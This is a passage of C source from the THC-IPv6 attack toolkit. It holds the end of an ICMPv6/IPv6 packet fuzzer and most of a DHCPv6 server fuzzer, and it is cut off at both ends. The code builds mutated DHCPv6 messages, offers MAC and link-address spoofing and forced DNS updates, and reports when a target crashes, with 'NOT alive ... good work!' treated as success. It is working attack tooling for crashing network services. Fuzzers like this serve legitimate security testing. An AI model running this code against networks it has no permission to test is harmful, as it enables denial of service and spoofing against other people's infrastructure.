= 26; buf[i++] = 1; buf[i++] = 0x08; i += 5; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, buf, i, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6ra); break; case DO_MLD_QUERY: case DO_MLD_DONE: case DO_MLD_REP: buf[0] = 0xff; buf[1] = 0x02; buf[15] = 0x05; if (someaddr6 != NULL) memcpy(buf, someaddr6, 16); if (thc_add_icmp6(pkt, &pkt_len, do_type, 0, wait, buf, 16, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6mld); break; case DO_MLD2_QUERY: buf[0] = 0xff; buf[1] = 0x02; buf[15] = 0x05; if (someaddr6 != NULL) memcpy(buf, someaddr6, 16); buf[16] = 7; buf[17] = 120; buf[19] = 3; memcpy(buf + 20, dst6, 16); memcpy(buf + 36, buf, 16); if (thc_add_icmp6(pkt, &pkt_len, DO_MLD_QUERY, 0, wait, buf, 68, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6mld2que); break; case DO_MLD2_REPORT: for (i = 0; i < 3; i++) { buf[0 + 68 * i] = 1 + i * 2 - i / 2; //include new++, generates 1, 3 and 4 buf[3 + 68 * i] = 3; //3 sources buf[4 + 68 * i] = 0xff; buf[5 + 68 * i] = 0x02; buf[18 + 68 * i] = 0x82 + i % 256; buf[19 + 68 * i] = 0xff; memcpy(buf + 20 + 68 * i, src6, 16); buf[36 + 68 * i] = 0xfe; buf[37 + 68 * i] = 0x80; buf[46 + 68 * i] = 0xf0; if (someaddr6 != NULL) memcpy(buf + 52 + 68 * i, someaddr6, 16); } if (thc_add_icmp6(pkt, &pkt_len, do_type, 0, 3, buf, 208, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6mld2rep); break; default: fprintf(stderr, "ERROR: Mode not implemented yet!\n"); exit(-1); } if (thc_generate_pkt(interface, srcmac, mac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; if (jumbo) { i = 0; j = 1; while (i < hdr->pkt_len + 4 && j) { if (hdr->pkt[i] == 'J') if (memcmp(&hdr->pkt[i], "JJJJ", 4) == 0) j = 0; i++; } if (j) { fprintf(stderr, "ERROR: fuckup, cant find my own marker?!\n"); exit(-1); } else i--; hdr->pkt[i] = 0; hdr->pkt[i + 1] = 0; hdr->pkt[i + 2] = hdr->pkt[4 + off2]; hdr->pkt[i + 3] = hdr->pkt[5 + off2]; hdr->pkt[4 + off2] = 0; hdr->pkt[5 + off2] = 0; } if (extend) for (i = 0; i < strlen(fuzzbuf); i++) if (fuzzbuf[i] == 'B' || fuzzbuf[i] == 'F') fuzzbuf[i] = 'X'; // backup of generated packet pkt_bak = malloc(hdr->pkt_len); memcpy(pkt_bak, hdr->pkt, hdr->pkt_len); printf("Fuzzing packet, starting at fuzz case %d, ending at fuzz case %d, every packet sent denoted by a dot:\n", test_start, test_end); //printf("buf(%d): %s\n", strlen(fuzzbuf), fuzzbuf); while (do_fuzz) { if (test_cnt == 0) while (fuzzbuf[test_ptr] == '.') { test_ptr++; test_pos++; } if (fuzzbuf[test_ptr] == 0) do_fuzz = 0; test_cnt++; do_it = 1; //printf("[%s] pos[%d]=%c -> %d | pkt[%d] | %d (%d=>%d)| ", /*fuzzbuf*/"", test_ptr, fuzzbuf[test_ptr], test_cnt, test_pos, test_current, test_start, test_end); switch (fuzzbuf[test_ptr]) { case 0: break; case 'X': if (test_cnt <= COUNT_EXTEND) { if (pkt_bak[test_pos] != extends[test_cnt - 1]) hdr->pkt[test_pos] = extends[test_cnt - 1]; else do_it = 0; } else { test_cnt = 0; test_ptr++; test_pos++; } break; case 'B': if (test_cnt <= COUNT_BYTE) { if (pkt_bak[test_pos] != bytes[test_cnt - 1]) hdr->pkt[test_pos] = bytes[test_cnt - 1]; else do_it = 0; } else { i = 0; while (i < COUNT_BYTE && do_it) { if (bytes[i] == pkt_bak[test_pos]) do_it = 0; i++; } if (do_it) hdr->pkt[test_pos] = hdr->pkt[test_pos] ^ xors[test_cnt - COUNT_BYTE - 1]; } if (test_cnt == COUNT_BYTE + COUNT_XOR) { test_cnt = 0; test_ptr++; test_pos++; } break; case 'F': if (test_cnt <= COUNT_FLAG) { if (pkt_bak[test_pos] != flags[test_cnt - 1]) hdr->pkt[test_pos] = flags[test_cnt - 1]; else do_it = 0; } else { i = 0; while (i < COUNT_FLAG && do_it) { if (bytes[i] == pkt_bak[test_pos]) // yes, bytes[] is the right one even for flags do_it = 0; i++; } if (do_it) hdr->pkt[test_pos] = hdr->pkt[test_pos] ^ xors[test_cnt - COUNT_BYTE - 1]; } if (test_cnt == COUNT_FLAG + COUNT_XOR) { test_cnt = 0; test_ptr++; test_pos++; } break; case 'W': sip = (unsigned short int *) &pkt_bak[test_pos]; if (test_cnt <= COUNT_WORD) { if (*sip != words[test_cnt - 1]) memcpy((char *) &hdr->pkt[test_pos], (char *) &words[test_cnt - 1] + _TAKE2, 2); else do_it = 0; } else { i = 0; while (i < COUNT_WORD && do_it) { if (words[i] == *sip) do_it = 0; i++; } if (do_it) { i = *sip ^ xors[test_cnt - COUNT_WORD - 1]; sip = (unsigned short int *) &hdr->pkt[test_pos]; *sip = i % 65536; } } if (test_cnt == COUNT_WORD + COUNT_XOR) { test_cnt = 0; test_ptr++; test_pos += 2; } break; default: fprintf(stderr, "This character should not be in the fuzz string, shoot the programmer: %c(%d) position %d string %s\n", fuzzbuf[test_ptr], fuzzbuf[test_ptr], test_ptr, fuzzbuf); exit(-1); break; } if (do_it && do_fuzz) { if (test_current >= test_start && test_current <= test_end && do_fuzz) { // fill icmp id+seq and unique buffer with test case number if (fragment) memcpy(hdr->pkt + frag_offset + 58, (char *) &test_current + _TAKE4, 4); switch (do_type) { case DO_NONE: // empty break; case DO_PING: for (i = 0; i < 4 + 1; i++) memcpy(hdr->pkt + offset + 58 + i * 4, (char *) &test_current + _TAKE4, 4); break; case DO_TCP: memcpy(hdr->pkt + offset + 58, (char *) &test_current + _TAKE4, 4); break; case DO_NEIGHSOL: case DO_NEIGHADV: break; // do nothing for these case DO_NODEQUERY: memcpy(hdr->pkt + offset + 66, (char *) &test_current + _TAKE4, 4); break; case DO_RA: memcpy(hdr->pkt + offset + 0x62, (char *) &test_current + _TAKE4, 4); // prefix update memcpy(hdr->pkt + offset + 0x7e, hdr->pkt + offset + 0x5e, 16); // routing update memcpy(hdr->pkt + 8, (char *) &test_current + _TAKE4, 4); // srcmac update memcpy(hdr->pkt + offset + 0x72, (char *) &test_current + _TAKE4, 4); // srcmac update memcpy(hdr->pkt + 0x10 + off2, (char *) &test_current + _TAKE4, 4); // srcip update memcpy(hdr->original_src, hdr->pkt + 8 + off2, 16); // srcip update for checksum break; case DO_MLD_QUERY: case DO_MLD_DONE: case DO_MLD_REP: case DO_MLD2_QUERY: memcpy(hdr->pkt + offset + 0x4a, (char *) &test_current + _TAKE4, 4); break; case DO_MLD2_REPORT: //??? XXX TODO CHECK memcpy(hdr->pkt + offset + 0x4d, (char *) &test_current + _TAKE4, 4); memcpy(hdr->pkt + offset + 0x4d + 68, (char *) &test_current + _TAKE4, 4); memcpy(hdr->pkt + offset + 0x4d + 136, (char *) &test_current + _TAKE4, 4); break; default: fprintf(stderr, "ERROR!!!\n"); exit(-1); } // regenerate checksum if (do_type != DO_TCP && do_type != DO_NONE) { // maybe for later non-icmp stuff hdr->pkt[offset + 56] = 0; hdr->pkt[offset + 57] = 0; i = checksum_pseudo_header(hdr->original_src, hdr->final_dst, NXT_ICMP6, &hdr->pkt[offset + 54], hdr->pkt_len - offset - 54); hdr->pkt[offset + 56] = i / 256; hdr->pkt[offset + 57] = i % 256; } else { // TCP hdr->pkt[offset + 70] = 0; hdr->pkt[offset + 71] = 0; i = checksum_pseudo_header(hdr->original_src, hdr->final_dst, NXT_TCP, &hdr->pkt[offset + 54], hdr->pkt_len - offset - 54); hdr->pkt[offset + 70] = i / 256; hdr->pkt[offset + 71] = i % 256; } // send packet for (k = 0; k < no_send; k++) { while(thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); } printf("."); usleep(250); // if ping, check ping again if ((test_current - test_start) % ping == 0 && test_current != 0 && test_start != test_current) if (check_alive(p, interface, srcmac, mac, src6, real_dst6) == 0) { i = ((((test_current - test_start) / ping) - 1) * ping) + test_start + 1; printf("\nResult: target %s crashed during fuzzing, offending test case no. could be %d to %d\n", argv[optind + 1], i < 0 ? 0 : i, test_current); exit(1); } } //else printf("NOT SENT - NOT IN TEST LIST\n"); // reset to basic packet memcpy(hdr->pkt, pkt_bak, hdr->pkt_len); test_current++; } //else printf("NOT SENT!\n"); } printf("\n"); // ping afterwards to check if it worked if (do_alive) { if (check_alive(p, interface, srcmac, mac, src6, real_dst6) == 0) { printf("Result: target %s is NOT alive via direct ping6 - good work! (position: %d)\n", argv[optind + 1], test_pos); exit(1); } else printf("Result: target %s is still alive via direct ping6, better luck next time.\n", argv[optind + 1]); } thc_pcap_close(p); return 0; } thc-ipv6-2.5/fuzz_dhcps6.c0000644000000000000000000007243612251022437014141 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" #define COUNT_FLAG 11 #define COUNT_BYTE 4 #define COUNT_WORD 16 #define COUNT_XOR 2 #define COUNT_EXTEND 256 #define COUNT_DWORD 256 #define NEVER 2000000000 #define TEST_MAX (NEVER - 1) #define DO_SOL 1 #define DO_REQ 2 #define DO_CON 3 #define DO_REN 4 #define DO_REB 5 #define DO_DEC 6 #define DO_REL 7 #define DO_INF 8 #define STATELESS 0 #define STATEFULL 1 /* * Fuzzing data types: * F = flags = 1 byte = 8 bits | flags | 8 ; 256 * B = byte = 1 byte | 0 1 254 255 xor XOR | 6 ; 256 * X = byte = 1 byte | all values from 0 to 255 * W = word = 2 bytes | 0,1,254,255^2 xor XOR | 18 ; 65536 * D = double word = 4 bytes | {0,1,254,255}^4 xor XOR | 258 ; 4294967295 * . = byte = ignore, jump over * */ char fuzztype_ether[] = ".............."; //14 byte header char fuzztype_ip6[] = "........................................"; //40 byte header char fuzztype_udp[] = "........"; //8 byte header char fuzztype_dhcp6[] = "X..."; //4 byte header (fuzz message type) char fuzztype_dhcp6no[] = "...."; //4 byte header (don't fuzz message type) //OPTION HEADERS char fuzztype_elapsed_time[] = "WWW"; //6 byte header char fuzztype_client_identifier[] = "WWWWDWWW"; //18 byte header char fuzztype_server_identifier[] = "WWWWDWWW"; //18 byte header char fuzztype_IA_NA[] = "WWDDD"; //16 byte header char fuzztype_IA_Address[] = "WWXX..............DD"; char fuzztype_FQDN[] = "WWF"; //5 byte header + length of domain string to be added in programatically char fuzztype_option_request[] = "WWW"; //6 byte header (add extra W for each additional option) // //Matched solicit from RF manual // char fuzztype_solicit[] = ".......FFFFFFFFF................BBBXXXX"; // //Still have to add in other types. // char fuzztype_tran_id[] = "XF..WXBXX..............XX.............."; // char fuzztype_options[] = "........................................"; unsigned char flags[] = { 0, 1, 2, 4, 8, 16, 32, 64, 128, 254, 255 }; // 11 unsigned char bytes[] = { 0, 1, 254, 255 }; // 4 unsigned short int words[] = { 0x0000, 0x0001, 0x00fe, 0x00ff, 0x0100, 0x0101, 0x01fe, 0x01ff, 0xfe00, 0xfe01, 0xfefe, 0xfeff, 0xff00, 0xff01, 0xfffe, 0xffff }; // 16 unsigned int xors[] = { 0, 0xffffffff }; // 2 unsigned char extends[] = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255 }; // 256 unsigned int dwords[] = { 0x00000000, 0x00000001, 0x000000fe, 0x000000ff, 0x00000100, 0x00000101, 0x000001fe, 0x000001ff, 0x0000fe00, 0x0000fe01, 0x0000fefe, 0x0000feff, 0x0000ff00, 0x0000ff01, 0x0000fffe, 0x0000ffff, 0x00010000, 0x00010001, 0x000100fe, 0x000100ff, 0x00010100, 0x00010101, 0x000101fe, 0x000101ff, 0x0001fe00, 0x0001fe01, 0x0001fefe, 0x0001feff, 0x0001ff00, 0x0001ff01, 0x0001fffe, 0x0001ffff, 0x00fe0000, 0x00fe0001, 0x00fe00fe, 0x00fe00ff, 0x00fe0100, 0x00fe0101, 0x00fe01fe, 0x00fe01ff, 0x00fefe00, 0x00fefe01, 0x00fefefe, 0x00fefeff, 0x00feff00, 0x00feff01, 0x00fefffe, 0x00feffff, 0x00ff0000, 0x00ff0001, 0x00ff00fe, 0x00ff00ff, 0x00ff0100, 0x00ff0101, 0x00ff01fe, 0x00ff01ff, 0x00fffe00, 0x00fffe01, 0x00fffefe, 0x00fffeff, 0x00ffff00, 0x00ffff01, 0x00fffffe, 0x00ffffff, 0x01000000, 0x01000001, 0x010000fe, 0x010000ff, 0x01000100, 0x01000101, 0x010001fe, 0x010001ff, 0x0100fe00, 0x0100fe01, 0x0100fefe, 0x0100feff, 0x0100ff00, 0x0100ff01, 0x0100fffe, 0x0100ffff, 0x01010000, 0x01010001, 0x010100fe, 0x010100ff, 0x01010100, 0x01010101, 0x010101fe, 0x010101ff, 0x0101fe00, 0x0101fe01, 0x0101fefe, 0x0101feff, 0x0101ff00, 0x0101ff01, 0x0101fffe, 0x0101ffff, 0x01fe0000, 0x01fe0001, 0x01fe00fe, 0x01fe00ff, 0x01fe0100, 0x01fe0101, 0x01fe01fe, 0x01fe01ff, 0x01fefe00, 0x01fefe01, 0x01fefefe, 0x01fefeff, 0x01feff00, 0x01feff01, 0x01fefffe, 0x01feffff, 0x01ff0000, 0x01ff0001, 0x01ff00fe, 0x01ff00ff, 0x01ff0100, 0x01ff0101, 0x01ff01fe, 0x01ff01ff, 0x01fffe00, 0x01fffe01, 0x01fffefe, 0x01fffeff, 0x01ffff00, 0x01ffff01, 0x01fffffe, 0x01ffffff, 0xfe000000, 0xfe000001, 0xfe0000fe, 0xfe0000ff, 0xfe000100, 0xfe000101, 0xfe0001fe, 0xfe0001ff, 0xfe00fe00, 0xfe00fe01, 0xfe00fefe, 0xfe00feff, 0xfe00ff00, 0xfe00ff01, 0xfe00fffe, 0xfe00ffff, 0xfe010000, 0xfe010001, 0xfe0100fe, 0xfe0100ff, 0xfe010100, 0xfe010101, 0xfe0101fe, 0xfe0101ff, 0xfe01fe00, 0xfe01fe01, 0xfe01fefe, 0xfe01feff, 0xfe01ff00, 0xfe01ff01, 0xfe01fffe, 0xfe01ffff, 0xfefe0000, 0xfefe0001, 0xfefe00fe, 0xfefe00ff, 0xfefe0100, 0xfefe0101, 0xfefe01fe, 0xfefe01ff, 0xfefefe00, 0xfefefe01, 0xfefefefe, 0xfefefeff, 0xfefeff00, 0xfefeff01, 0xfefefffe, 0xfefeffff, 0xfeff0000, 0xfeff0001, 0xfeff00fe, 0xfeff00ff, 0xfeff0100, 0xfeff0101, 0xfeff01fe, 0xfeff01ff, 0xfefffe00, 0xfefffe01, 0xfefffefe, 0xfefffeff, 0xfeffff00, 0xfeffff01, 0xfefffffe, 0xfeffffff, 0xff000000, 0xff000001, 0xff0000fe, 0xff0000ff, 0xff000100, 0xff000101, 0xff0001fe, 0xff0001ff, 0xff00fe00, 0xff00fe01, 0xff00fefe, 0xff00feff, 0xff00ff00, 0xff00ff01, 0xff00fffe, 0xff00ffff, 0xff010000, 0xff010001, 0xff0100fe, 0xff0100ff, 0xff010100, 0xff010101, 0xff0101fe, 0xff0101ff, 0xff01fe00, 0xff01fe01, 0xff01fefe, 0xff01feff, 0xff01ff00, 0xff01ff01, 0xff01fffe, 0xff01ffff, 0xfffe0000, 0xfffe0001, 0xfffe00fe, 0xfffe00ff, 0xfffe0100, 0xfffe0101, 0xfffe01fe, 0xfffe01ff, 0xfffefe00, 0xfffefe01, 0xfffefefe, 0xfffefeff, 0xfffeff00, 0xfffeff01, 0xfffefffe, 0xfffeffff, 0xffff0000, 0xffff0001, 0xffff00fe, 0xffff00ff, 0xffff0100, 0xffff0101, 0xffff01fe, 0xffff01ff, 0xfffffe00, 0xfffffe01, 0xfffffefe, 0xfffffeff, 0xffffff00, 0xffffff01, 0xfffffffe, 0xffffffff }; // 256 char solicit[] = { 0x01, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x0e, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; int port = -1; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, "Brandon Hutcheson and Graeme Neilson", RESOURCE); printf("Syntax: %s [-t number | -T number] [-e number | -T number] [-p number] [-md] [-1|-2|-3|-4|-5|-6|-7|-8] interface [domain-name]\n\n", prg); printf("Fuzzes an DHCPv6 packet\n"); printf("Options:\n"); printf(" -1 fuzz DHCPv6 Solicit (default)\n"); printf(" -2 fuzz DHCPv6 Request\n"); printf(" -3 fuzz DHCPv6 Confirm\n"); printf(" -4 fuzz DHCPv6 Renew\n"); printf(" -5 fuzz DHCPv6 Rebind\n"); printf(" -6 fuzz DHCPv6 Release\n"); printf(" -7 fuzz DHCPv6 Decline\n"); printf(" -8 fuzz DHCPv6 Information Request\n"); printf(" -m fuzz the message type as well\n"); printf(" -t number continue from test no. number\n"); printf(" -e number continue to test no. number\n"); printf(" -T number only performs test no. number\n"); printf(" -n number how many times to send each packet (default: 1)\n"); printf(" -f spoof mac\n"); printf(" -F spoof link address\n"); printf(" -p number perform an alive check every number of tests (default: none)\n"); printf(" -d Use -d to force DNS updates, you can specify a domain name on the commandline.\n"); printf("You can only define one of -0 ... -4, defaults to -1.\n"); printf("Returns -1 on error, 0 on tests done and targt alive or 1 on target crash.\n"); exit(-1); } char dnsupdate1[] = { 0, 39, 0, 8, 1, 6, 122, 97, 97, 97, 97, 97 }; char dnsupdate2[] = { 0, 6, 0, 2, 0, 39 }; char dns_option_hdr[256]; int dns_option_hdr_len = 0; char fuzzbuf[256]; char *interface = NULL, *dns_name = NULL, elapsed[6] = { 0, 8, 0, 2, 0, 0 }; int do_dns = 0, test_start = 0, test_end = TEST_MAX, ping = NEVER, no_send = 1, got_packet = 0; pcap_t *p = NULL; int do_type = DO_SOL, fuzz_msg_type = 0; int timeout = 4; void ignoreit(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { return; } int try_send_pkt(char *interface, char *pkt, int *pkt_len) { //Try send packet int retry_send = 1; time_t start_time = time(NULL); while(time(NULL) - start_time < timeout && retry_send) { if (thc_send_pkt(interface, pkt, pkt_len) < 0) retry_send = 1; else retry_send = 0; } if (retry_send) { fprintf(stderr, "Timeout error: Unable to send check alive packet within timeout\n"); exit(-1); } } int check_alive(pcap_t * p) { int ret = -2, len, pkt_len = 0, i; time_t t; char wdatabuf[1024]; char *pkt = NULL; unsigned char *dst = thc_resolve6("ff02::1:2"); unsigned char *mac6 = thc_get_own_mac(interface); len = sizeof(solicit); memcpy(wdatabuf, solicit, len); // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand for (i = 0; i < 3; i++) { wdatabuf[i + 1] = rand() % 256; wdatabuf[i + 18] = rand() % 256; wdatabuf[i + 32] = rand() % 256; } memcpy(wdatabuf + 22, mac6, 6); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, NULL, dst, 1, 0, 0, 0, 0)) == NULL) { fprintf(stderr, "Error: Failed to create check allive ivp6 packet header\n"); exit(-1); } if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) { fprintf(stderr, "Error: Failed to create check allive udp packet header\n"); exit(-1); } if (thc_generate_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Failed to create check allive packet header\n"); exit(-1); } // debug = 1; //Empty packet capture queue while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); //Send initial solicit request try_send_pkt(interface, pkt, &pkt_len); //Check for response in loop and timeout if we don't get one t = time(NULL); while (ret < 0) { //Got reply packet; server alive! if (thc_pcap_check(p, (char *) ignoreit, NULL) > 0) ret = 1; //If we still haven't received a packet after 1 second resend the solicit if (time(NULL) > t + 1 && ret == -2) { if (thc_send_pkt(interface, pkt, &pkt_len) < 0) { //Don't want to use try_send_pkt as it could take longer than timeout usleep(75); thc_send_pkt(interface, pkt, &pkt_len); //Retry sending packet after short time if sending failed } ret = -1; } //Fail after 4 seconds if (time(NULL) > t + timeout && ret < 0) ret = 0; } if (ret == 0) { fprintf(stderr, "Timeout: Failed to receive dhcp solicitation replay in check alive function within %d seconds\n", timeout); } // debug = 0; thc_destroy_packet(pkt); return ret > 0 ? 1 : 0; } int fuzz_loop(char* pkt, int* pkt_len) { int do_fuzz = 1; int test_pos = 0, test_ptr = 0, test_cnt = 0, test_current = 0; int do_it; int i; unsigned short int *sip; unsigned int *intp; int fragment = 0, frag_offset = 0; unsigned char *pkt_bak; thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; // backup of generated packet pkt_bak = malloc(hdr->pkt_len); memcpy(pkt_bak, hdr->pkt, hdr->pkt_len); printf("Fuzzing packet, starting at fuzz case %d, ending at fuzz case %d:\n", test_start, test_end); printf("fuzzbuf(%d): %s\n", strlen(fuzzbuf), fuzzbuf); while (do_fuzz) { if (test_cnt == 0) while (fuzzbuf[test_ptr] == '.') { test_ptr++; test_pos++; } if (fuzzbuf[test_ptr] == 0) do_fuzz = 0; test_cnt++; do_it = 1; switch (fuzzbuf[test_ptr]) { case 0: break; case 'X': if (test_cnt <= COUNT_EXTEND) { if (pkt_bak[test_pos] != extends[test_cnt - 1]) hdr->pkt[test_pos] = extends[test_cnt - 1]; else do_it = 0; } else { test_cnt = 0; test_ptr++; test_pos++; } break; case 'B': if (test_cnt <= COUNT_BYTE) { if (pkt_bak[test_pos] != bytes[test_cnt - 1]) hdr->pkt[test_pos] = bytes[test_cnt - 1]; else do_it = 0; } else { i = 0; while (i < COUNT_BYTE && do_it) { if (bytes[i] == pkt_bak[test_pos]) do_it = 0; i++; } if (do_it) hdr->pkt[test_pos] = hdr->pkt[test_pos] ^ xors[test_cnt - COUNT_BYTE - 1]; } if (test_cnt == COUNT_BYTE + COUNT_XOR) { test_cnt = 0; test_ptr++; test_pos++; } break; case 'F': if (test_cnt <= COUNT_FLAG) { if (pkt_bak[test_pos] != flags[test_cnt - 1]) hdr->pkt[test_pos] = flags[test_cnt - 1]; else do_it = 0; } else { i = 0; while (i < COUNT_FLAG && do_it) { if (bytes[i] == pkt_bak[test_pos]) // yes, bytes[] is the right one even for flags do_it = 0; i++; } if (do_it) hdr->pkt[test_pos] = hdr->pkt[test_pos] ^ xors[test_cnt - COUNT_BYTE - 1]; } if (test_cnt == COUNT_FLAG + COUNT_XOR) { test_cnt = 0; test_ptr++; test_pos++; } break; case 'W': sip = (unsigned short int *) &pkt_bak[test_pos]; if (test_cnt <= COUNT_WORD) { if (*sip != words[test_cnt - 1]) memcpy((char *) &hdr->pkt[test_pos], (char *) &words[test_cnt - 1], 2); else do_it = 0; } else { i = 0; while (i < COUNT_WORD && do_it) { if (words[i] == *sip) do_it = 0; i++; } if (do_it) { i = *sip ^ xors[test_cnt - COUNT_WORD - 1]; sip = (unsigned short int *) &hdr->pkt[test_pos]; *sip = i % 65536; } } if (test_cnt == COUNT_WORD + COUNT_XOR) { test_cnt = 0; test_ptr++; test_pos += 2; } break; case 'D': intp = (unsigned int *) &pkt_bak[test_pos]; if (test_cnt <= COUNT_DWORD) { if (*intp != dwords[test_cnt - 1]) memcpy((char *) &hdr->pkt[test_pos], (char *) &dwords[test_cnt - 1], 4); else do_it = 0; } else { i = 0; while (i < COUNT_DWORD && do_it) { if (dwords[i] == *intp) do_it = 0; i++; } if (do_it) { i = *intp ^ xors[test_cnt - COUNT_DWORD - 1]; intp = (unsigned int *) &hdr->pkt[test_pos]; *intp = (unsigned int) i; // *intp = (unsigned int) (i % 4294967295); } } if (test_cnt == COUNT_DWORD + COUNT_XOR) { test_cnt = 0; test_ptr++; test_pos += 4; } break; default: fprintf(stderr, "This character should not be in the fuzz string, shoot the programmer: %c(%d) position %d string %s\n", fuzzbuf[test_ptr], fuzzbuf[test_ptr], test_ptr, fuzzbuf); return -1; break; } if (do_it && do_fuzz) { if (test_current >= test_start && test_current <= test_end && do_fuzz) { printf("[%s] pos[%d]=%c -> %d | pkt[%d] | %d (%d=>%d)| \n", /*fuzzbuf*/"", test_ptr, fuzzbuf[test_ptr], test_cnt, test_pos, test_current, test_start, test_end); // Generate new transaction id int three_byte_test_current = test_current % 0x1000000; memcpy(hdr->pkt + 63, (char *) &three_byte_test_current, 3); // Regenerate UDP checksum hdr->pkt[60] = 0; hdr->pkt[61] = 0; i = checksum_pseudo_header(hdr->original_src, hdr->final_dst, NXT_UDP, &hdr->pkt[54], hdr->pkt_len - 54); hdr->pkt[60] = i / 256; hdr->pkt[61] = i % 256; // send packets int k; for (k = 0; k < no_send; k++) { while(thc_send_pkt(interface, pkt, pkt_len) < 0) usleep(1); } // printf("."); usleep(250); // TODO: Server up check if ((test_current - test_start) % ping == 0 && test_current != 0 && test_start != test_current) if (check_alive(p) == 0) { i = ((((test_current - test_start) / ping) - 1) * ping) + test_start + 1; printf("\nResult: target %s crashed during fuzzing, offending test case no. could be %d to %d\n", thc_ipv62notation(hdr->final_dst), i < 0 ? 0 : i, test_current); exit(1); } } // reset to basic packet memcpy(hdr->pkt, pkt_bak, hdr->pkt_len); test_current++; } } } void construct_from_adv_and_fuzz(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { int len = header->caplen, pkt_len = 0, mlen = 10, olen; unsigned char *ptr = (unsigned char *) data, *pkt = NULL; char *smac, mac[6] = { 0, 0x0d, 0, 0x0d, 0x0d, 0x0e }; char mybuf[1024] = { 0x03, 0, 0, 0, 0, 8, 0, 2, 0, 0 }; int done_dns = 0, i; //Begin fuzz buffer strcat(fuzzbuf, fuzztype_elapsed_time); //Set message type switch (do_type) { case DO_REQ: mybuf[0] = 0x03; break; case DO_CON: mybuf[0] = 0x04; break; case DO_REN: mybuf[0] = 0x05; break; case DO_REL: mybuf[0] = 0x08; break; case DO_DEC: mybuf[0] = 0x09; break; case DO_INF: mybuf[0] = 0x0B; break; default: fprintf(stderr, "Error: Unknown do type %d\n", do_type); exit(-1); break; } //Skip over header to dhcp header if (do_hdr_size) { data += do_hdr_size; len -= do_hdr_size; if ((data[0] & 240) != 0x60) return; } else { data += 14; len -= 14; } if (len < 126 || data[6] != NXT_UDP || data[48] != 2) return; data += 48; len -= 48; //Copy transaction id and skip to message options memcpy(mybuf + 1, data + 1, 3); data += 4; len -= 4; //Loop over options till reach end of header while (len >= 4) { //Set olen to the option length minus type and length fields and check for bogus packet if ((olen = data[2] * 256 + data[3]) > len - 4 || olen < 0) { //the 4 here is the 4 bytes for the option type and option length fields printf("Information: evil packet received\n"); olen = 0; len = -1; } else { //Copy server identifier or IA_NA to message if (data[1] > 1 && data[1] <= 3 && !(data[1] == 2 && do_type == DO_CON) && !(data[1] == 3 && do_type == DO_INF)) { //skip copying server identifier for confirm or IA_NA for information request messages memcpy(mybuf + mlen, data, olen + 4); mlen += olen + 4; //Append server identifier fuzzing if (data[1] == 2) strcat(fuzzbuf, fuzztype_server_identifier); //Append IA_NA fuzzing + IA Address fuzzing else if (data[1] == 3) { strcat(fuzzbuf, fuzztype_IA_NA); if (olen > 12) strcat(fuzzbuf, fuzztype_IA_Address); } // printf("buf(%d): %s\n", strlen(fuzzbuf), fuzzbuf); } //Copy client identifier to message else if (data[1] == 1) { memcpy(mybuf + mlen, data, olen + 4); mlen += olen + 4; //smac auf client mac in paket setzen if (olen == 14) smac = (char *) (data + 12); else smac = mac; //Append client identifier fuzzing strcat(fuzzbuf, fuzztype_client_identifier); // printf("buf(%d): %s\n", strlen(fuzzbuf), fuzzbuf); } //Copy dns option else if (data[1] == 39 && do_dns) { memcpy(mybuf + mlen, data, olen + 4); mybuf[mlen + 4] = 1; // force server to write dns entry mlen += olen + 4; //Append dns fuzzing strcat(fuzzbuf, fuzztype_FQDN); for (i = 0; i < olen - 1; ++i) strcat(fuzzbuf, "B"); //Fuzz the domain name string strcat(fuzzbuf, fuzztype_option_request); // printf("buf(%d): %s\n", 